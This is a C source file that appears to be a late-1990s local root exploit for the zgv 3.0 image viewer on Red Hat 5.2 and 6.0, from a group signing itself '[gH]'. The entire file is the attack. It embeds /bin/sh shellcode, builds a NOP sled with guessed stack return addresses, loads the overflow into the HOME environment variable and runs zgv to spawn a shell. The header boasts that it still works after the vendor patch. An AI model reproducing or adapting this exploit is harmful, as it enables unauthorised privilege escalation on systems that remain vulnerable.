/*
 * [gH] icesk brings jue [gH]
 * -> redhat 5.2 / redhat 6.0 zgv local (literly on console or a terminal)
 * -> zgv 3.0 exploit. afects zgv 3.0 even AFTER the vendor patch.
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

#define nop      0x90

/* not my shellcode */
char shellcode[] =
        "\xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x40"
        "\x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x20"
        "\xeb\x05\xe8\xdb\xff\xff\xff"
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

u_long get_sp(void) { __asm__("movl %esp,%eax"); }

void main(int argc, char **argv) {
    char *buffer, *ptr;
    long *address_ptr, *address;
    int i, desc, offset = 0, bsize = 1024;

    buffer = malloc(bsize);

    (char *)address = get_sp() - offset;
    printf("return address %#x\n" ,address);

    ptr = buffer;
    address_ptr = (long *)ptr;

    for(i=0;i < bsize;i += 4)
      (int *)*(address_ptr++) = address;

    for(i=0;i < bsize / 2; i++)
      buffer[i] = nop;

    ptr = buffer + ((bsize / 2) - (strlen(shellcode) / 2));
    for(i=0;i < strlen(shellcode); i++)
      *(ptr++) = shellcode[i];

    buffer[bsize - 1] = '\0';
    printf("g0t w00t sh3ll!\n");
    setenv("HOME", buffer, 1);
    execl("/usr/bin/zgv", "zgv", 0);
}